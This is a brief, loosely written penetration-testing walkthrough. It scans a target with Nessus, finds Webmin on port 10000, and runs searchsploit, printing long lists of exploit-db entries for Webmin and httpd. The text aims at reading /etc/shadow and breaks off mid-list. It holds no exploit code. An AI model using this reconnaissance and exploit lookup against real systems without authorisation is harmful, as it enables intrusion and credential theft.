Information Security: PRIVILEGE ESCALATION

Privilege Escalation
ip Adrress or ip target first scanned with nessus

after completion of a scan with nessus

double click on the total scan,and will appear as display below

select protocol tcp choose the number of ports 10000

open and select name webmin, and the results are as below our live analysis

after that we seek etc shadow to exploit DB

root@bt:/pentest/exploits/exploitdb# ls

files.csv platforms searchsploit

root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin

Description Path

--------------------------------------------------------------------------- -------------------------

Webmin BruteForce and Command Execution Exploit /multiple/remote/705.pl

Webmin Web Brute Force v1.5 (cgi-version) /multiple/remote/745.cgi

Webmin BruteForce + Command Execution v1.5 /multiple/remote/746.pl

Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php

Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl

phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt

phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt

root@bt:/pentest/exploits/exploitdb# ls -lia

total 2300

1969260 drwxr-xr-x 4 root root 4096 2012-01-16 23:03 .

1967574 drwxr-xr-x 9 root root 4096 2011-08-17 02:42 ..

1969268 -rwxr-xr-x 1 root root 2316060 2012-01-16 23:03 files.csv

2101860 drwxr-xr-x 40 root root 20480 2012-01-02 14:48 platforms

1969269 -rwxr-xr-x 1 root root 1124 2011-06-12 02:05 searchsploit

2101859 drwxr-xr-x 6 root root 4096 2012-01-16 23:03 .svn

root@bt:/pentest/exploits/exploitdb# ./searchsploit httpd

Description Path

--------------------------------------------------------------------------- -------------------------

Apache HTTPd Arbitrary Long HTTP Headers DoS /multiple/dos/360.pl

Apache HTTPd Arbitrary Long HTTP Headers DoS (c version) /linux/dos/371.c

Sumus 0.2.2 httpd Remote Buffer Overflow Exploit /linux/remote/940.c

zawhttpd <= 0.8.23 (GET) Remote Buffer Overflow DoS /linux/dos/1746.pl

RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution Exploit /windows/remote/2328.php

SHTTPD 1.34 (POST) Remote Buffer Overflow Exploit /windows/remote/2482.pl

corehttp 0.5.3alpha (httpd) Remote Buffer Overflow Exploit /linux/remote/4243.c

EDraw Office Viewer Component 5.1 HttpDownloadFile() Insecure Method /windows/remote/4290.html

Lighttpd <= 1.4.16 FastCGI Header Overflow Remote Exploit /multiple/remote/4391.c

Airsensor M520 HTTPD Remote Preauth DoS / BOF PoC /hardware/dos/4426.pl

Lighttpd <= 1.4.17 FastCGI Header Overflow Remote Exploit /linux/remote/4437.c

Simple HTTPD <= 1.38 Multiple Remote Vulnerabilities /windows/remote/4700.txt

Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit /windows/dos/4717.py

RaidenHTTPD 2.0.19 (ulang) Remote Command Execution Exploit /windows/remote/4747.vbs

Ruby 1.8.6 (Webrick Httpd 1.3.1) Directory Traversal Vulnerability /multiple/remote/5215.txt

VLC 0.8.6d httpd_FileCallBack Remote Format String Exploit /windows/remote/5519.c

Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC /hardware/dos/6394.pl

fhttpd 0.4.2 un64() Remote Denial of Service Exploit /linux/dos/6493.pl

Linksys Wireless ADSL Router (WAG54G V.2) httpd DoS Exploit /hardware/dos/7535.php

EDraw Office Viewer 5.4 HttpDownloadFile() Insecure Method Vuln /windows/remote/7762.html

SW-HTTPD Server 0.x Remote Denial of Service Exploit /multiple/dos/8245.c

httpdx <= 0.5b Multiple Remote Denial of Service Vulnerabilities /windows/dos/8712.txt

httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH) /windows/remote/8716.py

httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH) /windows/remote/8732.py

Lighttpd < 1.4.23 Source Code Disclosure Vulnerability (BSD/Solaris bug) /multiple/remote/8786.txt

httpdx <= 0.8 FTP Server Delete/Get/Create Directories/Files Exploit /windows/remote/8897.c

DD-WRT (httpd service) Remote Command Execution Vulnerability /hardware/remote/9209.txt

httpdx Web Server 1.4 (Host Header) Remote Format String DoS Exploit /windows/dos/9657.pl

httpdx <= 1.4.6b source disclosure /windows/webapps/9885.txt

httpdx 1.4 h_handlepeer BoF /windows/remote/9886.txt

httpdx 1.4 Get Request Buffer Overflow /windows/remote/10053.txt

OrzHTTPd Format String Exploit /linux/remote/10282.py

httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash) /windows/dos/11343.py

RCA DCM425 Cable Modem micro_httpd DoS/PoC /hardware/dos/11597.py

httpdx v1.5.3b Multiple - Remote Pre-Authentication DoS (PoC crash) /windows/dos/11734.py

Motorola SB5101 Hax0rware Rajko HTTPD Remote Exploit PoC /hardware/dos/13774.pl

Httpdx 1.5.4 Multiple Denial of Service Vulnerabilities (http-ftp) PoC /windows/dos/14683.py

httpdASM 0.92 Directory Traversal /windows/remote/15861.txt

Caedo HTTPd Server v 0.5.1 ALPHA Remote File Download /windows/remote/16075.pl

HTTPDX tolog() Function Format String Vulnerability /windows/remote/16732.rb

SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32) /win32/remote/16759.rb

HTTPDX tolog() Function Format String Vulnerability /windows/remote/16794.rb

HTTPDX h_handlepeer() Function Buffer Overflow /windows/remote/16799.rb

jHTTPd 0.1a Directory Traversal Vulnerability /multiple/remote/17068.py

Simple HTTPd 1.42 Denial of Servive Exploit /windows/dos/17658.py

Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability /windows/remote/17669.py

Apache httpd Remote Denial of Service (memory exhaustion) /multiple/dos/17696.pl

FleaHttpd Remote Denial Of Service Exploit /linux/dos/18120.py

lighttpd Denial of Service Vulnerability PoC /linux/dos/18295.